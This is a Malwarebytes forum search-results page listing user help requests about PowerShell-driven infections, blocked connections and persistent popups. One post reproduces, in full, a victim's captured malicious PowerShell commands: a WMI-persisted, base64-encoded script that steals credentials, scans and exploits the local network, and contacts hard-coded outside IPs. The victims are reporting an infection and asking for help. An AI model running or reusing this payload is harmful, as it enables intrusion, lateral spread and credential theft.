Jump to content

Search the Community

Showing results for tags 'powershell'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes 3 Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Endpoint Protection
    • Malwarebytes Incident Response (includes Breach Remediation)
    • Malwarebytes Endpoint Security
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Location


Interests

Found 19 results

  1. Dear, forum For the last couple of days, I have had a MBAE popup saying it has blocked an exploit attempt on Powershell. It pops up every 20 minutes. I have run RogueKiller, which only found an issue with Hola VPN (which I have now removed). I also tried to turn off Powershell in "Control Panel > Programs and features > Turn Window Features On and OFF". This did not help. I have Windows 10. I use Windows Defender as virus protection. The MBAE build is 1.12.1.139. After reading several posts, it seems to me that there is no one-fix-that-works-for-everyone. So I'm turning to you experts asking if you could please help me. Best regards, Harald
  2. Hello, i have problem with powershell.exe it slow down my pc, but i dont know what to do to delete him, can anybody help me please? I saw few topics and i installed frst64 in attach are logs. Thank you. Addition.txt FRST.txt
  3. Back on August 17, I installed Malwarebytes on my machine since I was having performance issues. The scan found 16 threats on my PC, and removed them as such. Even after this scan though, and several others, Windows Powershell is still performing some suspicious activity. Malwarebytes will occasionally notify me of an outbound connection to "wentz.pw" that Powershell keeps attempting to make. This is classified as "riskware", but I'm concerned since I can't get rid of it. Attached is the log for the most recent connection attempt. blocklog.txt
  4. Every time I restart my PC, I get a notification from Malwarebytes that a 'website was blocked due to malware'. It claims to be an outbound connection affecting the file 'powershell.exe'. The website is f.top4top.net. Malwarebytes identifies this as malware but it is not a program I can remove and I have never visited that website. I'm looking to sort out whatever the issue may be here. The logs can be found below. Malwarebytes www.malwarebytes.com -Log Details- Protection Event Date: 7/8/18 Protection Event Time: 4:25 PM Log File: 137327b6-82ed-11e8-8c03-1c1b0d993f99.json Administrator: Yes -Software Information- Version: 3.5.1.2522 Components Version: 1.0.374 Update Package Version: 1.0.5823 License: Trial -System Information- OS: Windows 10 (Build 17134.112) CPU: x64 File System: NTFS User: System -Blocked Website Details- Malicious Website: 1 , , Blocked, [-1], [-1],0.0.0 -Website Data- Category: Malware Domain: f.top4top.net IP Address: 185.186.244.145 Port: [49871] Type: Outbound File: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (end)
  5. Hi Malwarebytes support, My windows 10 was affected by adware/malware and I have used malwarebytes to remove most of it. However, there' still one malware that can't be removed by malwarebytes. Whenever I startup my windows a powershell cmd appears for a brief second and disappears. I took a screenshot for your reference (refer to attached). It appears to be a powershell command that executes new-object net.webclient.downloadstring(URL). Malwarebyte then detects a malware found at the location c:\windows\winime.exe and quarantines it. Sometimes a myexe.exe malware is also found. Hence i remove it from the quarantine. But that did not fix the problem. Everytime i restart my laptop, the powershell launched again and malwarebytes detected the malware again and quarantine it. Process repeats at every startup. It appears to be that the powershell command that was executed at startup causes this. I have no idea how to remove that powershell cmd or prevent the it from running the command. Please help. Would greatly appreciate your help on this. Malwarebyte did not detect the powershell problem. Regards, Dil
  6. I have PowerShell on windows server 2008 R2 using cpu 100% and I have attach file: Addition.txt and FRST.txt help analyze. I hope to get help with this issue. Thanks you, Oatstate Addition.txt FRST.txt
  7. Hello I have been having an issue with our server at work recently and cant get to the bottom of it. Two Powershell windows keep opening in the background running a script one of which consuming a lot of CPU power. I can end the task or suspend the process but it always returns. This machine hosts a domain and several users log into this server via remote desktop on the default port 3389 These are the scrips - the first one is the one using 70% of the CPU - the second one always appears first "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Office_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')" powershell.exe -NoP -NonI -W Hidden -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAANAAoAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAZgB1AG4AcwAnAF0ALgBWAGEAbAB1AGUAIAAgACAAIAAgACAAIAAgAA0ACgAkAGQAZQBmAHUAbgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZgB1AG4AcwApACkADQAKAGkAZQB4ACAAJABkAGUAZgB1AG4ADQAKAA0ACgBHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAXwBfAEYAaQBsAHQAZQByAFQAbwBDAG8AbgBzAHUAbQBlAHIAQgBpAG4AZABpAG4AZwAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAcwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGYAaQBsAHQAZQByACAALQBuAG8AdABtAGEAdABjAGgAIAAnAFMAQwBNACAARQB2AGUAbgB0ACAATABvAGcAcwAnAH0AIAB8AFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQADQAKACQAZABpAHIAcABhAHQAaAA9ACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACsAJwBcAHMAeQBzAHQAZQBtADMAMgAnACAAIAAgAA0ACgBpAGYAIAAgACgAIQAoAHQAZQBzAHQALQBwAGEAdABoACAAJABkAGkAcgBwAGEAdABoACAAKQApAHsADQAKAAkAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQADQAKAH0ADQAKAGkAZgAgACgAIQAoAHQAZQBzAHQALQBwAGEAdABoACAAKAAkAGQAaQByAHAAYQB0AGgAKwAnAFwAbQBzAHYAYwBwADEAMgAwAC4AZABsAGwAJwApACkAKQANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADUANQAiACkALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA3ADcANwA3ACIAKQApACAALQBhAG4AZAAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIARQBTAFQAQQBCAEwASQBTAEgARQBEACIAKQApAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABlAHYAaQBkAD0AJABsAGkAbgBlAFsALQAxAF0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AaQBkACAAJABlAHYAaQBkACAAfAAgAHMAdABvAHAALQBwAHIAbwBjAGUAcwBzACAALQBmAG8AcgBjAGUADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAGkAZgAgACgAIQAkAGUAeABpAHMAdAAgAC0AYQBuAGQAIAAoACQAcABzAGkAZABzAC4AYwBvAHUAbgB0ACAALQBsAGUAIAA4ACkAKQANAAoAewAgACAAIAANAAoAIAAgACAAIAAkAGMAbQBkAG0AbwBuAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBOAG8AUAAgAC0ATgBvAG4ASQAgAC0AVwAgAEgAaQBkAGQAZQBuACAAYAAiAGAAJABtAG8AbgAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoATwBmAGYAaQBjAGUAXwBVAHAAZABhAHQAZQByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG0AbwBuACcAXQAuAFYAYQBsAHUAZQA7AGAAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAZgB1AG4AcwAnAF0ALgBWAGEAbAB1AGUAIAA7AGkAZQB4ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABgACQAZgB1AG4AcwApACkAKQA7AEkAbgB2AG8AawBlAC0AQwBvAG0AbQBhAG4AZAAgACAALQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIABgACQAUgBlAG0AbwB0AGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAEAAKABgACQAbQBvAG4ALAAgAGAAJABtAG8AbgAsACAAJwBWAG8AaQBkACcALAAgADAALAAgACcAJwAsACAAJwAnACkAYAAiACIADQAKACAAIAAgACAAJAB2AGIAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDAG8AbQBPAGIAagBlAGMAdAAgAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwADQAKAAkAJAB2AGIAcwAuAHIAdQBuACgAJABjAG0AZABtAG8AbgAsADAAKQAgACAADQAKAH0ADQAKAA0ACgAkAE4AVABMAE0APQAkAEYAYQBsAHMAZQANAAoAJABtAGkAbQBpACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBpAG0AaQAnAF0ALgBWAGEAbAB1AGUAIAANAAoAJABhACwAIAAkAE4AVABMAE0APQAgAEcAZQB0AC0AYwByAGUAZABzACAAJABtAGkAbQBpACAAJABtAGkAbQBpAA0ACgAgACAAIAAgACAAIAAgAA0ACgAkAE4AZQB0AHcAbwByAGsAcwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATgBlAHQAdwBvAHIAawBBAGQAYQBwAHQAZQByAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AIAAtAEUAQQAgAFMAdABvAHAAIAB8ACAAPwAgAHsAJABfAC4ASQBQAEUAbgBhAGIAbABlAGQAfQAgACAAIAAgAA0ACgAkAGkAcABzAHUAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AE8AZgBmAGkAYwBlAF8AVQBwAGQAYQB0AGUAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpAHAAcwB1ACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGkAMQA3ACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQAxADcAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAHMAYwBiAGEAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAcwBjACcAXQAuAFYAYQBsAHUAZQANAAoAWwBiAHkAdABlAFsAXQBdACQAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBjAGIAYQApACAAIAAgACAAIAANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABOAGUAdAB3AG8AcgBrACAAaQBuACAAJABOAGUAdAB3AG8AcgBrAHMAKQAgAA0ACgB7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgAA0ACgAgACAAIAAgACQASQBQAEEAZABkAHIAZQBzAHMAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAHAAQQBkAGQAcgBlAHMAcwBbADAAXQAgACAADQAKAAkAaQBmACAAKAAkAEkAUABBAGQAZAByAGUAcwBzACAALQBtAGEAdABjAGgAIAAnAF4AMQA2ADkALgAyADUANAAnACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgAAkADQAKACAAIAAgACAAJABTAHUAYgBuAGUAdABNAGEAcwBrACAAIAA9ACAAJABOAGUAdAB3AG8AcgBrAC4ASQBQAFMAdQBiAG4AZQB0AFsAMABdACAAIAANAAoAIAAgACAAIAAkAGkAcABzAD0ARwBlAHQALQBOAGUAdAB3AG8AcgBrAFIAYQBuAGcAZQAgACQASQBQAEEAZABkAHIAZQBzAHMAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsADQAKAAkAJAB0AGMAcABjAG8AbgBuACAAPQAgAG4AZQB0AHMAdABhAHQAIAAtAGEAbgBvAHAAIAB0AGMAcAAgAA0ACgAJAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoACQAJAGkAZgAgACgAJABsAGkAbgBlAC4AYwBvAHUAbgB0ACAALQBsAGUAIAA0ACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoACQAJACQAaQA9ACQAbABpAG4AZQBbAC0AMwBdAC4AcwBwAGwAaQB0ACgAJwA6ACcAKQBbADAAXQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIAAoACQAbABpAG4AZQBbAC0AMgBdACAALQBlAHEAIAAnAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAnACkAIAAtAGEAbgBkACAAIAAoACQAaQAgAC0AbgBlACAAJwAxADIANwAuADAALgAwAC4AMQAnACkAIAAtAGEAbgBkACAAKAAkAGkAcABzACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAKQApAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABpAHAAcwArAD0AJABpAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGkAZgAgACgAKABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAAtACQAcwB0AGkAbQBlACkALwAxADAAMAAwACAALQBnAHQAIAA1ADQAMAAwACkAewBiAHIAZQBhAGsAfQANAAoACQAkAHMAZQA9AEAAKAAnADEAMAA3AC4AMQA3ADkALgA2ADcALgAyADQAMwAnACwAJwAxADcAMgAuADIANAA3AC4AMQAxADYALgA4ACcAKQANAAoACQAkAG4AaQBjAD0AJwAxADEAOAAuADEAOAA0AC4ANAA4AC4AOQA1ACcADQAKAAkAZgBvAHIAZQBhAGMAaAAoACQAdAAgAGkAbgAgACQAcwBlACkADQAKAAkAewANAAoACQAJACQAcABpAG4APQB0AGUAcwB0AC0AYwBvAG4AbgBlAGMAdABpAG8AbgAgACQAdAANAAoACQAJAGkAZgAgACgAJABwAGkAbgAgAC0AbgBlACAAJABuAHUAbABsACkADQAKAAkACQB7AA0ACgAJAAkACQAkAG4AaQBjAD0AJAB0AA0ACgAJAAkACQBiAHIAZQBhAGsADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAJABuAGkAYwA9ACQAbgBpAGMAKwAiADoAOAAwADAAMAAiAA0ACgANAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAGkAcAAgAGkAbgAgACQAaQBwAHMAKQANAAoAIAAgACAAIAB7ACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGkAcAAgAC0AZQBxACAAJABJAFAAQQBkAGQAcgBlAHMAcwApAHsAYwBvAG4AdABpAG4AdQBlAH0AIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoAFQAZQBzAHQALQBDAG8AbgBuAGUAYwB0AGkAbwBuACAAJABpAHAAIAAtAGMAbwB1AG4AdAAgADEAKQAgAC0AbgBlACAAJABuAHUAbABsACAAIAAtAGEAbgBkACAAJABpAHAAcwB1ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApACAADQAKACAAIAAgACAAIAAgACAAIAB7ACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHIAZQA9ADAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABhAC4AYwBvAHUAbgB0ACAALQBuAGUAIAAwACkAIAAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsAJAByAGUAIAA9ACAAdABlAHMAdAAtAGkAcAAgAC0AaQBwACAAJABpAHAAIAAtAGMAcgBlAGQAcwAgACQAYQAgACAALQBuAGkAYwAgACQAbgBpAGMAIAAtAG4AdABsAG0AIAAkAE4AVABMAE0AIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAcgBlACAALQBlAHEAIAAxACkAewAkAGkAcABzAHUAIAA9ACQAaQBwAHMAdQAgACsAIgAgACIAKwAkAGkAcAB9AA0ACgAJAAkACQBlAGwAcwBlAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJACQAdgB1AGwAPQBbAFAAaQBuAGcAQwBhAHMAdABsAGUALgBTAGMAYQBuAG4AZQByAHMALgBtADEANwBzAGMAXQA6ADoAUwBjAGEAbgAoACQAaQBwACkACQAJAAkACQANAAoACQAJAAkACQBpAGYAIAAoACQAdgB1AGwAIAAtAGEAbgBkACAAJABpADEANwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBPAGYAZgBpAGMAZQBfAFUAcABkAGEAdABlAHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA== Addition.txt FRST.txt mb.txt AdwCleaner[S1].txt MyConsoleSettings.txt MyScheduledTasks.txt
  8. I should thank to Malwarebytes to remove the Ransomware from my PC. unfotunately, it doesn't fix my computer completely. i read a post so i run the same thing like it was told. please help me to analyze my FR i should fixST and Addition file reported by farbar recovery tool. what i should do next? Addition.txt FRST.txt
  9. Hi my name is win. My computer platform is Windows 10 Yesterday My powershell started appearing on my taskbar, just popping up before promptly disappearing. I was suspicious but up to date Avast and Malwarebytes scans didn't find anything so I assumed it was just a dodgy Windows update or something. So I run Farbar Recovery Scan Tool and RougeKiller according to the topic below. I have seen the topic below but i don't know if there are a different between me and him. So i decidRk.txtRk.txtRk.txte to ask you for your advice. I have attached my result here below. Thank you very much for your kindly help. FRST.txt Addition.txt RoKiller.txt
  10. Hi! Im basically having the same exact problem as this guy: After powershell runs, Malwarebytes scans and finds the same three PUP's. I keep deleting them, but powershell keeps putting them back on my computer. I don't know what to do about it and I don't want to mess with the registry logs without an experts assistance. Please Help! The Pup files.txt
  11. Hi, I posted something similar a few weeks back but got no response. I think my computer is infected with malware that uses windows powershell to execute. I have Malwarebytes Premium and every now and then it blocks the domain 'tablezip.info'. It's persistent and every time I attempt to scan and remove it, it reappears after a few days and I get pop-ups and malicious adware. Any help removing would be greatly appreciated. Addition.txt FRST.txt
  12. So I've posted before about some odd happenings and never really found a solution but think I got a little closer. In my event logs, I have several power shell events like pshell console starting a server (among other things), Multiple WMI services starting, and browser redirects. Nothing has ever been found by Win defender or MBAM Premium (I really don't feel like they're working - on the surface they seem to working fine but I think it's an illusion). Hitman Pro did find a file Win32.Droma.abdb (first malicious file I've ever found) and that led me to googling that and found this article. http://niiconsulting.com/checkmate/2014/04/analysis-of-malware-detecting-behavior-anti-reversing-techniques/ ^^Please read! That almost explains my situation to a tee - I've even seen Russian/Chinese sites that will occasionally pop up on google suspiciously. If you look at my Registry or a Driverquery of my windows drivers, there are red flags everywhere. As far as I know I'm on the latest update of Win10 but I'm not sure anymore. I was hoping an expert could read the above article and know immediately what's going on or, if not, help me figure it out in order to get rid of it I've reinstalled windows after nuking it 5 times. I've been careful about any kind of syncing application (I don't even have chrome installed) and have reset the sync of any services I do use. I could go on but will stop here and wait for an experts advice should I run FRST? Oh yeah, some programs think I'm on Windows 8 (including mbam) and I thinks that's due to registry infection. i would LOVE to get a clean bill of health because this has consumed way to much of my life in the past ~8 months off an on. Thanks in advance! Fingers crossed
  13. Hi, so as the title states, Windows Powershell opens up maybe three or four times a day in the background and then quickly shuts itself down after a second. I haven't really seen any negative side effects from this, but it's starting to get annoying. I have run Malwarebytes scan but it has returned 0 identified threats. Are there any recommended options? Thank you!
  14. Every time I turn on my computer and start doing stuff, a windows powershell cmd pop up for a few seconds and then dissapear. I then start runing Malwarebytes and I find 5 Potentially Unwated Programs related to it. I put them on Quarantine and restart, and then everything start all over again. How do I get rid of whatever PowerShell is doing?
  15. Hi As stated from the title above, there is a suspicious program I've found in the startup as attached in the startup.txt named "{FB744D93...". I've tried to disable, and also removing it but nothing works. It is still there everytime upon laptop startup. It starts to behave like this after my brother inserted his flash drive into my laptop There is a topic that is more likely the same (if I'm not mistaken) that has been posted yesterday. Thus I have attached all the required files. Thanks in advance! Addition.txt FRST.txt regexport.txt startup.txt
